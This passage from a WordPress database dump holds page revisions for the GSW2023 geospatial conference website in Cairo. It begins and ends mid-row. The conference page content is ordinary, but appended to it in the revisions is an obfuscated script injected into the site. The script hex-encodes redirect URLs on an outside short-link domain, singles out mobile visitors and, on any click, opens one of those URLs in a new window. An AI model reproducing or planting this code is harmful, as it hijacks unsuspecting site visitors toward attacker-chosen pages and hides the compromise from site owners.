_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 00:09:36','2023-02-04 00:09:36','',3066,'https://gsw2023.com/?p=3727',0,'revision','',0),
(3728,1,'2023-02-04 00:43:09','2023-02-04 00:43:09','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 00:43:09','2023-02-04 00:43:09','',3066,'https://gsw2023.com/?p=3728',0,'revision','',0),
(3729,1,'2023-02-04 00:58:45','2023-02-04 00:58:45','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3162\" 